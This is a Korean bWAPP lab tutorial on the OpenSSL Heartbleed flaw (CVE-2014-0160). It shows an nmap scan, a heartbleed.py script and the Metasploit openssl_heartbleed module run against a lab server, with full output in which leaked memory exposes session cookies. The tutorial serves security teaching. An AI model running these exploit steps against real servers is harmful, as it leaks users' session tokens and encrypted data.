웹 해킹 bWAPP - 83. A6 - Sensitive Data Exposure - Heartbleed Vulnerability
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Sensitive Data Exposure
- OWASP Top10 A6 - 민감한 데이터 노출
- 서버와 클라이언트 간에 평문으로 데이터 전송시 스니핑(MITM) 공격에 의해서 정보가 유출될 수 있다.
- 그렇기 때문에 SSL(HTTPs) 보안 통신 연결을 이용하여 암호화/인증을 통하여 데이터를 보호해야 한다.
- 또한, 데이터 처리와 암호화 저장이 클라이언트에서 진행되면 공격자가 클라이언트 제어권을 획득하여 정보가 유출될
수 있으니, 서버에서 진행하는 것을 권장한다.
2. Heartbleed Vulnerability
- Open SSL 라이브러리의 구조적인 취약점이다.
- Open SSL 환경에서 서버와 클라이언트 간에 암호화 통신을 통해서 안정적인 연결이 유지되는지 Heartbeat 기능
(Keepalive 기능 수행)을 사용한다.
- 동작 과정은 클라이언트가 임의 길이를 갖고 있는 정보를 서버에게 보내면 서버는 동일한 길이의 정보를 응답한다.
- 이때, 클라이언트가 거짓의 길이 정보를 서버에게 보내면 서버는 Heartbeat에서 이를 검증하지 않고,
거짓 길이의 정보만큼 응답하는 취약점이 있다.
- Ex) 족발집에서 족발을 주문할때 "대자같은 소자 주세요~" 라고 요청시 바보같이 정말 대자를 주는 경우....
- CVE-2014-0160 취약점 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160
3. Sensitive Data Exposure - Heartbleed Vulnerability
- 이 시나리오는 Heartbleed 취약점을 이용한 스캔을 실시하여 정보를 획득하는 내용이다.
Ex1) Sensitive Data Exposure - Heartbleed Vulnerability 이해
보안 레벨 선택 및 시나리오 선택
'attack scritp...'을 클릭하여 'heartbleed.py' 다운로드 실시
'파일 저장' 선택 -> '확인' 버튼 클릭
83-0. bWAPP HTTPs 주소.txt
로컬 브라우저에서 https로 bWAPP 접속 및 로그인 실시
'nmap'을 이용하여 Hearbleed 취약점 스켄 실시
|
root@kali:~# nmap --script ssl-heartbleed -sV -p 8443 192.168.20.205
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-22 17:09 KST
Nmap scan report for www.bwapphttpslow.com (192.168.20.205)
Host is up (0.00019s latency).
PORT STATE SERVICE VERSION
8443/tcp open ssl/http nginx 1.4.0
|_http-server-header: nginx/1.4.0
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://www.openssl.org/news/secadv_20140407.txt
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://cvedetails.com/cve/2014-0160/
MAC Address: 00:0C:29:5B:24:81 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
root@kali:~#
|
'heartbleed.py'을 이용하여 취약점 확인
|
root@kali:~# cd Downloads/
root@kali:~/Downloads# ls
heartbleed.py o-saft
root@kali:~/Downloads# python heartbleed.py -p 8443 192.168.20.205
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 675
... received message: type = 22, ver = 0302, length = 203
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 0D 0A 41 63 ....#.........Ac
00e0: 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 cept-Language: e
00f0: 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 35 0D 0A 41 n-US,en;q=0.5..A
0100: 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 ccept-Encoding:
0110: 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C 20 62 gzip, deflate, b
0120: 72 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 70 r..Referer: http
0130: 73 3A 2F 2F 31 39 32 2E 31 36 38 2E 32 30 2E 32 s://192.168.20.2
0140: 30 35 3A 38 34 34 33 2F 0D 0A 43 6F 6F 6B 69 65 05:8443/..Cookie
0150: 3A 20 73 65 63 75 72 69 74 79 5F 6C 65 76 65 6C : security_level
0160: 3D 30 3B 20 50 48 50 53 45 53 53 49 44 3D 61 35 =0; PHPSESSID=a5
0170: 63 38 34 64 39 33 35 34 39 35 31 38 65 64 37 30 c84d93549518ed70
0180: 61 39 62 66 37 32 62 63 32 31 64 63 37 30 0D 0A a9bf72bc21dc70..
0190: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 Connection: keep
01a0: 2D 61 6C 69 76 65 0D 0A 55 70 67 72 61 64 65 2D -alive..Upgrade-
01b0: 49 6E 73 65 63 75 72 65 2D 52 65 71 75 65 73 74 Insecure-Request
01c0: 73 3A 20 31 0D 0A 0D 0A 46 FD 95 C3 F7 C7 4F 09 s: 1....F.....O.
01d0: 49 FD AB 9C 1C 6F 56 F3 00 00 00 00 00 00 00 00 I....oV.........
01e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0200: 63 2D 77 65 62 72 74 63 03 66 74 70 00 0F 00 01 c-webrtc.ftp....
0210: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0220: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0230: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0240: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0250: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0260: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
~ 중간 생략 ~
root@kali:~/Downloads# cd
root@kali:~# |
메타스플로잇을 이용하여 Heartbleed 취약점 확인
|
root@kali:~# msfconsole -q
msf >
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf auxiliary(scanner/ssl/openssl_heartbleed) > exploit
[*] 192.168.20.205:8443 - Sending Client Hello...
[*] 192.168.20.205:8443 - SSL record #1:
[*] 192.168.20.205:8443 - Type: 22
[*] 192.168.20.205:8443 - Version: 0x0301
[*] 192.168.20.205:8443 - Length: 86
[*] 192.168.20.205:8443 - Handshake #1:
[*] 192.168.20.205:8443 - Length: 82
[*] 192.168.20.205:8443 - Type: Server Hello (2)
[*] 192.168.20.205:8443 - Server Hello Version: 0x0301
[*] 192.168.20.205:8443 - Server Hello random data: 5c6fafe68f37d438af05b1d195db859b5666fd7667fc23f5b108e47f636d32e9
[*] 192.168.20.205:8443 - Server Hello Session ID length: 32
[*] 192.168.20.205:8443 - Server Hello Session ID: 756919b93f7415b1fcd9ffeb957d0f23845412404bcb4c785e7f8093131ccdc9
[*] 192.168.20.205:8443 - SSL record #2:
[*] 192.168.20.205:8443 - Type: 22
[*] 192.168.20.205:8443 - Version: 0x0301
[*] 192.168.20.205:8443 - Length: 675
[*] 192.168.20.205:8443 - Handshake #1:
[*] 192.168.20.205:8443 - Length: 671
[*] 192.168.20.205:8443 - Type: Certificate Data (11)
[*] 192.168.20.205:8443 - Certificates length: 668
[*] 192.168.20.205:8443 - Data length: 671
[*] 192.168.20.205:8443 - Certificate #1:
[*] 192.168.20.205:8443 - Certificate #1: Length: 665
[*] 192.168.20.205:8443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000055f85285dd88>, issuer=#<OpenSSL::X509::Name:0x000055f85285ddb0>, serial=#<OpenSSL::BN:0x000055f85285ddd8>, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[*] 192.168.20.205:8443 - SSL record #3:
[*] 192.168.20.205:8443 - Type: 22
[*] 192.168.20.205:8443 - Version: 0x0301
[*] 192.168.20.205:8443 - Length: 203
[*] 192.168.20.205:8443 - Handshake #1:
[*] 192.168.20.205:8443 - Length: 199
[*] 192.168.20.205:8443 - Type: Server Key Exchange (12)
[*] 192.168.20.205:8443 - SSL record #4:
[*] 192.168.20.205:8443 - Type: 22
[*] 192.168.20.205:8443 - Version: 0x0301
[*] 192.168.20.205:8443 - Length: 4
[*] 192.168.20.205:8443 - Handshake #1:
[*] 192.168.20.205:8443 - Length: 0
[*] 192.168.20.205:8443 - Type: Server Hello Done (14)
[*] 192.168.20.205:8443 - Sending Heartbeat...
[*] 192.168.20.205:8443 - Heartbeat response, 13027 bytes
[+] 192.168.20.205:8443 - Heartbeat response with leak
[*] 192.168.20.205:8443 - Printable info leaked:
......\n..Ghj-.2...0.xJD.yq...C..cM.+...f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................4; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36..Accept: text/css,*/*;q=0.1..Referer: https://192.168.20.205:8443/bWAPP/heartbleed.php..Accept-Encoding: gzip, deflate, br..Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7..Cookie: PHPSESSID=2684e39de9267451950927d36aa1d0cc; security_level=0....o......g..."...TUS;q=0.8,en;q=0.7..Cookie: PHPSESSID=2684e39de9267451950927d36aa1d0cc; security_level=0....Br.....TF;..<...=0.8,en;q=0.7..Cookie: PHPSESSID=2684e39de9267451950927d36aa1d0cc; security_level=0....bug=96&form_bug=submit..P}...*.....V_rform=submit5@Qs...r0jUuM^3..|.....[.....a.~.H.<./.3...$...]...L.J..................................................................................................................................... repeated 11964 times .....................................................................................................................................
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssl/openssl_heartbleed) > quit
root@kali:~# |
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 83. A6 - bWAPP Sensitive Data Exposure - Heartbleed Vulnerability https://youtu.be/grvtXQ2Vrt8
